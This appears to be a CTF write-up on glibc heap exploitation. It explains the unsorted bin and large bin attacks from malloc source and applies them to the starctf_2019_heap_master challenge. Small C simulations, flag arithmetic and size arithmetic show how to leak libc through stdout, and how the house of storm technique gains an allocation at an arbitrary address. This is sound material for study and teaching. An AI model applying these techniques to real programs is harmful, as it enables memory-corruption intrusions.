/* This struct declaration is misleading (but accurate and necessary).
   It declares a "view" into memory allowing access to necessary
   fields at known offsets from a given base. See explanation below. */

struct malloc_chunk {

  INTERNAL_SIZE_T      prev_size;   /* Size of previous chunk (if free).  */
  INTERNAL_SIZE_T      size;        /* Size in bytes, including overhead. */

  struct malloc_chunk* fd;          /* double links -- used only if free. */
  struct malloc_chunk* bk;

  /* Only used for large blocks: pointer to next larger size.  */
  struct malloc_chunk* fd_nextsize; /* double links -- used only if free. */
  struct malloc_chunk* bk_nextsize;
};
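Before reading the _int_malloc excerpt below, it helps to fix the field offsets this "view" implies. The following is a minimal sketch, assuming a 64-bit build where INTERNAL_SIZE_T is size_t (8 bytes); it mirrors the layout above and prints the offsets used throughout this article (fd at +0x10, bk at +0x18, fd_nextsize at +0x20, bk_nextsize at +0x28, with user data starting at chunk + 0x10):

/* Sketch only: a stand-in with the same layout as struct malloc_chunk,
   used to print the offsets referenced later.  Assumes 64-bit glibc. */
#include <stdio.h>
#include <stddef.h>

struct chunk_view {
    size_t prev_size;                  /* +0x00 */
    size_t size;                       /* +0x08 */
    struct chunk_view *fd;             /* +0x10 (also where user data starts) */
    struct chunk_view *bk;             /* +0x18 */
    struct chunk_view *fd_nextsize;    /* +0x20 */
    struct chunk_view *bk_nextsize;    /* +0x28 */
};

int main(void)
{
    printf("prev_size   +%#zx\n", offsetof(struct chunk_view, prev_size));
    printf("size        +%#zx\n", offsetof(struct chunk_view, size));
    printf("fd          +%#zx\n", offsetof(struct chunk_view, fd));
    printf("bk          +%#zx\n", offsetof(struct chunk_view, bk));
    printf("fd_nextsize +%#zx\n", offsetof(struct chunk_view, fd_nextsize));
    printf("bk_nextsize +%#zx\n", offsetof(struct chunk_view, bk_nextsize));
    return 0;
}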
static void *
_int_malloc (mstate av, size_t bytes)
{
  INTERNAL_SIZE_T nb;               /* normalized request size */
  unsigned int idx;                 /* associated bin index */
  mbinptr bin;                      /* associated bin */

  mchunkptr victim;                 /* inspected/selected chunk */
  INTERNAL_SIZE_T size;             /* its size */
  int victim_index;                 /* its bin index */

  mchunkptr remainder;              /* remainder from a split */
  unsigned long remainder_size;     /* its size */

  unsigned int block;               /* bit map traverser */
  unsigned int bit;                 /* bit map traverser */
  unsigned int map;                 /* current word of binmap */

  mchunkptr fwd;                    /* misc temp for linking */
  mchunkptr bck;                    /* misc temp for linking */

  const char *errstr = NULL;

  /*
     Convert request size to internal form by adding SIZE_SZ bytes
     overhead plus possibly more to obtain necessary alignment and/or
     to obtain a size of at least MINSIZE, the smallest allocatable
     size. Also, checked_request2size traps (returning 0) request sizes
     that are so large that they wrap around zero when padded and
     aligned.
   */

  checked_request2size (bytes, nb);

  /* There are no usable arenas.  Fall back to sysmalloc to get a chunk from
     mmap.  */
  if (__glibc_unlikely (av == NULL))
    {
      void *p = sysmalloc (nb, av);
      if (p != NULL)
        alloc_perturb (p, bytes);
      return p;
    }

  /*
     If the size qualifies as a fastbin, first check corresponding bin.
     This code is safe to execute even if av is not yet initialized, so we
     can try it without checking, which saves some time on this fast path.
   */
  /*
     If a small request, check regular bin.  Since these "smallbins"
     hold one size each, no searching within bins is necessary.
     (For a large request, we need to wait until unsorted chunks are
     processed to find best fit. But for small ones, fits are exact
     anyway, so we can check now, which is faster.)
   */

  /* If the request fit a smallbin this branch would run; in our
     scenario it is skipped as well.  */
  if (in_smallbin_range (nb))
    {
      idx = smallbin_index (nb);
      bin = bin_at (av, idx);

      if ((victim = last (bin)) != bin)
        {
          if (victim == 0) /* initialization check */
            malloc_consolidate (av);
          else
            {
              bck = victim->bk;
              if (__glibc_unlikely (bck->fd != victim))
                {
                  errstr = "malloc(): smallbin double linked list corrupted";
                  goto errout;
                }
              set_inuse_bit_at_offset (victim, nb);
              bin->bk = bck;
              bck->fd = bin;
              /* ... rest of the smallbin path elided ... */

  /*
     If this is a large request, consolidate fastbins before continuing.
     While it might look excessive to kill all fastbins before
     even seeing if there is space available, this avoids
     fragmentation problems normally associated with fastbins.
     Also, in practice, programs tend to have runs of either small or
     large requests, but less often mixtures, so consolidation is not
     invoked all that often in most programs. And the programs that
     it is called frequently in otherwise tend to fragment.
   */

  /*
     Process recently freed or remaindered chunks, taking one only if
     it is exact fit, or, if this a small request, the chunk is remainder from
     the most recent non-exact fit.  Place other traversed chunks in
     bins.  Note that this step is the only place in any routine where
     chunks are placed in bins.

     The outer loop here is needed because we might not realize until
     near the end of malloc that we should have consolidated, so must
     do so and retry. This happens at most once, and only when we
     would otherwise need to expand memory to service a "small" request.
   */

  /* The part relevant to the large bin attack starts here.  */
  for (;; )                            /* walk the unsorted bin */
    {
      int iters = 0;
      while ((victim = unsorted_chunks (av)->bk) != unsorted_chunks (av))  /* traverse from bk */
        {
          bck = victim->bk;
          if (__builtin_expect (victim->size <= 2 * SIZE_SZ, 0)
              || __builtin_expect (victim->size > av->system_mem, 0))
            malloc_printerr (check_action, "malloc(): memory corruption",
                             chunk2mem (victim), av);
          size = chunksize (victim);   /* size of the chunk being processed */

          /*
             If a small request, try to use last remainder if it is the
             only chunk in unsorted bin.  This helps promote locality for
             runs of consecutive small requests. This is the only
             exception to best-fit, and applies only when there is
             no exact fit for a small chunk.
           */

          /* last_remainder handling for small requests; skipped in our scenario.  */
          if (in_smallbin_range (nb) &&
              bck == unsorted_chunks (av) &&
              victim == av->last_remainder &&
              (unsigned long) (size) > (unsigned long) (nb + MINSIZE))
            {
              /* split and reattach remainder */
              remainder_size = size - nb;
              remainder = chunk_at_offset (victim, nb);
              unsorted_chunks (av)->bk = unsorted_chunks (av)->fd = remainder;
              av->last_remainder = remainder;
              remainder->bk = remainder->fd = unsorted_chunks (av);
              if (!in_smallbin_range (remainder_size))
                {
                  remainder->fd_nextsize = NULL;
                  remainder->bk_nextsize = NULL;
                }
              /* ... rest of the split handling elided ... */
            }

          /* remove from unsorted list */
          unsorted_chunks (av)->bk = bck;
          bck->fd = unsorted_chunks (av);  /* unlink victim from the unsorted bin;
                                              this pair of writes is the heart of the
                                              unsorted bin handling (and of the
                                              unsorted bin attack) */

          /* Take now instead of binning if exact fit */
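The excerpt stops just before the exact-fit check and the code that sorts victim into a small or large bin. The two unlink lines above are what the classic unsorted bin attack abuses: if victim->bk has been corrupted to point at target - 0x10, then bck->fd = unsorted_chunks (av) writes the address of the arena's unsorted-bin head (a main_arena address, e.g. main_arena + 88 on 64-bit glibc 2.23, as referenced in the house of orange discussion below) into *target. A minimal, self-contained sketch of just that write, with placeholders instead of a real arena and 64-bit offsets assumed:

/* Sketch only: simulates the single write an unsorted bin attack obtains. */
#include <stdio.h>
#include <stddef.h>

struct chunk {
    size_t prev_size, size;
    struct chunk *fd, *bk, *fd_nextsize, *bk_nextsize;
};

int main(void)
{
    struct chunk unsorted_head = {0};   /* stands in for unsorted_chunks(av)      */
    struct chunk victim = {0};          /* chunk sitting in the unsorted bin      */
    struct chunk *target = NULL;        /* value the attack overwrites            */

    /* attacker corruption: victim->bk = target - 0x10, so that bck->fd
       lands exactly on target (illustrative out-of-bounds pointer math) */
    victim.bk = (struct chunk *)((char *)&target - offsetof(struct chunk, fd));

    /* the two unlink writes from _int_malloc shown above */
    struct chunk *bck = victim.bk;
    unsorted_head.bk = bck;
    bck->fd = &unsorted_head;           /* *target = unsorted_chunks(av)          */

    printf("*target is now %p (unsorted_chunks(av) stand-in is at %p)\n",
           (void *)target, (void *)&unsorted_head);
    return 0;
}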
Calling malloc(0x100) makes malloc walk the unsorted bin; the 0x420 chunk gets sorted into the large bin, and the large bin attack fires during that insertion.
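The sorting step that the excerpt above omits is where the large bin attack itself happens: before glibc 2.30 the code links victim into the large bin through fd/bk and fd_nextsize/bk_nextsize without verifying them, so if the chunk already in the bin has had its bk and bk_nextsize corrupted, two attacker-chosen addresses receive the address of victim. A minimal, self-contained sketch of just those pointer writes (64-bit offsets assumed; target1/target2 are placeholders for, e.g., fields of _IO_2_1_stdout_):

/* Sketch only: replays the pointer writes of the pre-2.30 large bin
   insertion when "victim" (larger) is sorted into a bin that already
   holds "in_bin", whose bk and bk_nextsize the attacker controls. */
#include <stdio.h>
#include <stddef.h>

struct chunk {
    size_t prev_size, size;
    struct chunk *fd, *bk, *fd_nextsize, *bk_nextsize;
};

int main(void)
{
    struct chunk in_bin = {0}, victim = {0};
    struct chunk *target1 = NULL, *target2 = NULL;

    /* attacker corruption of the chunk already in the large bin */
    in_bin.bk          = (struct chunk *)((char *)&target1 - offsetof(struct chunk, fd));           /* -0x10 */
    in_bin.bk_nextsize = (struct chunk *)((char *)&target2 - offsetof(struct chunk, fd_nextsize));  /* -0x20 */

    /* the linking writes _int_malloc performs (no checks before 2.30) */
    struct chunk *fwd = &in_bin;
    victim.fd_nextsize = fwd;
    victim.bk_nextsize = fwd->bk_nextsize;
    fwd->bk_nextsize = &victim;
    victim.bk_nextsize->fd_nextsize = &victim;   /* write #1: *target2 = &victim */

    struct chunk *bck = fwd->bk;
    victim.bk = bck;
    victim.fd = fwd;
    fwd->bk = &victim;
    bck->fd = &victim;                           /* write #2: *target1 = &victim */

    printf("target1 = %p, target2 = %p, &victim = %p\n",
           (void *)target1, (void *)target2, (void *)&victim);
    return 0;
}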
Exploiting the large bin attack
Combining with an IO_FILE hijack
Using the arbitrary-address-write primitive of the large bin attack, the _IO_write_base field inside _IO_2_1_stdout_ is corrupted so that it points lower than it should (for example, its low byte is cleared). The next time the program calls puts or a similar function, the data between _IO_write_base and _IO_write_ptr is flushed out along with the normal output, leaking a libc address. This is what hijacking stdout means here.
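To see where such writes have to land inside stdout, the sketch below prints the offsets of the relevant fields. It assumes glibc, whose <stdio.h> exposes the struct _IO_FILE members; on 64-bit it should print +0 for _flags, +0x20 for _IO_write_base and +0x28 for _IO_write_ptr:

/* Sketch only: where the corrupted fields sit inside a glibc FILE. */
#include <stdio.h>
#include <stddef.h>

int main(void)
{
    printf("_flags         +%#zx\n", offsetof(FILE, _flags));
    printf("_IO_write_base +%#zx\n", offsetof(FILE, _IO_write_base));
    printf("_IO_write_ptr  +%#zx\n", offsetof(FILE, _IO_write_ptr));
    return 0;
}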
House of orange
The traditional house of orange uses an unsorted bin attack to write a main_arena + 88 address over _IO_list_all and then relies on the _chain field to pivot to a controlled fake file. The large bin attack is more convenient: it writes a heap address directly into _IO_list_all, so a fake IO_FILE structure can be built right there on the heap.
Hijack global_max_fast
A large bin attack overwrites global_max_fast with a heap address (a huge value), so that any chunk freed afterwards is placed into a fastbin; a fastbin attack can then be used to obtain an allocation at an arbitrary address.
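The reason this gives (near-)arbitrary placement is the fastbin index arithmetic: with global_max_fast made huge, free() of a chunk of size sz stores the chunk's address at &main_arena.fastbinsY[fastbin_index(sz)], and on 64-bit glibc fastbin_index(sz) is (sz >> 4) - 2 with no remaining upper bound. A small sketch of the size you would pick to hit a chosen address past the fastbin array (both addresses below are made-up placeholders):

/* Sketch only: size-to-slot arithmetic for the global_max_fast hijack. */
#include <stdio.h>

int main(void)
{
    unsigned long fastbinsY = 0x7ffff7dd1b28UL;  /* placeholder: &main_arena.fastbinsY[0] */
    unsigned long target    = 0x7ffff7dd2600UL;  /* placeholder: address we want to clobber */

    unsigned long idx = (target - fastbinsY) / 8;  /* fastbin slot overlapping the target   */
    unsigned long sz  = (idx + 2) << 4;            /* chunk size with fastbin_index(sz)==idx */

    printf("freeing a chunk of size %#lx writes its address to %#lx\n", sz, target);
    return 0;
}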
House of storm
With the large bin attack understood, we can move on to house of storm, which achieves allocation at an arbitrary address. In the challenge above we linked a legitimate unsorted bin chunk onto the bk of the not-yet-sorted large bin chunk sitting in the unsorted bin. Suppose instead we link an arbitrary address, say addr, onto that bk and then let the large bin attack run: what happens?
The large bin attack stage itself goes through fine; the problem comes afterwards, when the traversal continues, picks up the chunk we linked in, checks its size, finds it invalid and aborts. The fix is to use the large bin attack itself to first plant a heap pointer at the size position of addr, using a misaligned write so that the sixth byte of the written chunk address lands in the size field; with PIE enabled that byte is usually 0x55 or 0x56. Now we call malloc(0x40): the traversal first reaches the unsorted large bin chunk and the large bin attack fires, and when it then reaches the fake chunk at the arbitrary address, the size passes the checks and counts as an exact fit, so the chunk is returned to the user directly. The arbitrary address has been allocated successfully. (The arithmetic behind choosing malloc(0x40) is spelled out in the sketch below.)
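The size trick works because of masking and alignment: chunksize() ignores the low three flag bits, and request2size(0x40) is 0x50, so a size field whose usable byte is 0x55 or 0x56 is treated as an exact 0x50 fit. A quick check of that arithmetic (constants follow 64-bit glibc conventions and are reproduced here as assumptions, not copied verbatim):

/* Sketch only: why malloc(0x40) matches a fake size byte of 0x55/0x56. */
#include <stdio.h>
#include <stddef.h>

#define SIZE_SZ            sizeof(size_t)
#define MALLOC_ALIGN_MASK  (2 * SIZE_SZ - 1)   /* 0xf on 64-bit */
#define SIZE_BITS          ((size_t) 0x7)      /* flag bits masked off by chunksize() */
#define REQUEST2SIZE(req)  (((req) + SIZE_SZ + MALLOC_ALIGN_MASK) & ~MALLOC_ALIGN_MASK)
#define CHUNKSIZE(sz)      ((sz) & ~SIZE_BITS)

int main(void)
{
    size_t nb     = REQUEST2SIZE((size_t) 0x40);  /* normalized request: 0x50 */
    size_t fake55 = CHUNKSIZE((size_t) 0x55);     /* 0x55 -> 0x50 */
    size_t fake56 = CHUNKSIZE((size_t) 0x56);     /* 0x56 -> 0x50 */

    printf("request2size(0x40) = %#zx\n", nb);
    printf("chunksize(0x55)    = %#zx  exact fit: %d\n", fake55, fake55 == nb);
    printf("chunksize(0x56)    = %#zx  exact fit: %d\n", fake56, fake56 == nb);
    return 0;
}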
House of storm
How house of storm works
This technique applies to glibc 2.28 and earlier, because the unsorted bin attack it relies on stopped working in glibc 2.29.
ctf@70b53f87c516:~/pwn/实验脚本$ checksec starctf_2019_heap_master
[*] '/home/ctf/pwn/实验脚本/starctf_2019_heap_master'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
    Stripped: No
Static analysis in IDA
main()
prog_init()
add()
The add() function can only call malloc(); the returned heap pointer is not stored anywhere.
delete()
The delete() function can only free addresses within the heap_base range.
edit()
The edit() function, likewise, can only modify memory within the heap_base range (a rough sketch of the three primitives follows below).
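Based on those observations, the three menu functions plausibly decompile to something like the following. Everything here (the names heap_base and HEAP_WINDOW, the window size, and the exact bounds checks) is an assumption reconstructed from the description above, not the real binary:

/* Hypothetical sketch of the challenge's primitives as described:
   add() mallocs but drops the pointer; delete()/edit() take an offset
   that is only checked against a fixed window above heap_base, so
   freed memory can still be edited (UAF). */
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>

static char *heap_base;               /* region the menu operates on (assumed) */
#define HEAP_WINDOW 0x10000           /* assumed size of the editable window   */

static void prog_init(void)
{
    /* assumed: the binary maps a private region it calls heap_base */
    heap_base = mmap(NULL, HEAP_WINDOW, PROT_READ | PROT_WRITE,
                     MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
}

static void add(size_t size)          /* pointer is not saved anywhere */
{
    malloc(size);
}

static void delete(size_t offset)     /* free anything inside the window */
{
    if (offset < HEAP_WINDOW)
        free(heap_base + offset);
}

static void edit(size_t offset, const void *buf, size_t len)
{                                     /* write anywhere inside the window, even after free */
    if (offset < HEAP_WINDOW && len < HEAP_WINDOW - offset)
        memcpy(heap_base + offset, buf, len);
}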
Looking at the program's functionality:
the chunks malloc()'d in add() cannot be controlled through the program;
edit() and delete() only operate within the heap_base range;
the bug is that the heap can still be edited after delete(): a use-after-free.
The key point: one of the goals of this challenge is to make us lay out heap memory within the heap_base range.
Approach
The program has no show function and PIE is enabled, so the first step has to be leaking an address. The program does call puts and similar functions, so we can hijack _IO_2_1_stdout_. Either an unsorted bin attack or a large bin attack could perform the write, but an unsorted bin attack would corrupt the unsorted bin and make the rest of the exploit impossible, so we choose the large bin attack against _IO_2_1_stdout_.
Tampering with _IO_2_1_stdout_ to leak data puts requirements on flags: execution has to get past two if checks before it reaches the _IO_SYSWRITE call that sends out the data between _IO_write_base and _IO_write_ptr. Concretely, the low 4 bits of the lowest byte of flags must not contain the 8 bit (_IO_NO_WRITES must be clear), and the low 4 bits of the second byte must be 8 (_IO_CURRENTLY_PUTTING must be set). In other words, the unsorted bin chunk address we write into flags should end in something like 0x800.
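A small sketch of that flags requirement, using the glibc flag values _IO_NO_WRITES (0x8) and _IO_CURRENTLY_PUTTING (0x800); the address below is a made-up placeholder ending in 0x800:

/* Sketch only: does a candidate flags value pass the two checks above? */
#include <stdio.h>

#define _IO_NO_WRITES          0x0008
#define _IO_CURRENTLY_PUTTING  0x0800

int main(void)
{
    unsigned long flags = 0x55a4f2b0d800UL;    /* placeholder heap-chunk address */

    int ok = !(flags & _IO_NO_WRITES)          /* first if: must not bail out    */
           && (flags & _IO_CURRENTLY_PUTTING); /* second if: skip buffer setup   */

    printf("flags %#lx usable for the leak: %s\n", flags, ok ? "yes" : "no");
    return 0;
}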
From this analysis, the large bin attack is the most suitable way to attack _IO_2_1_stdout_, because two locations inside _IO_2_1_stdout_ need to be modified, flags and _IO_write_base, which matches the two pointer writes a large bin attack performs.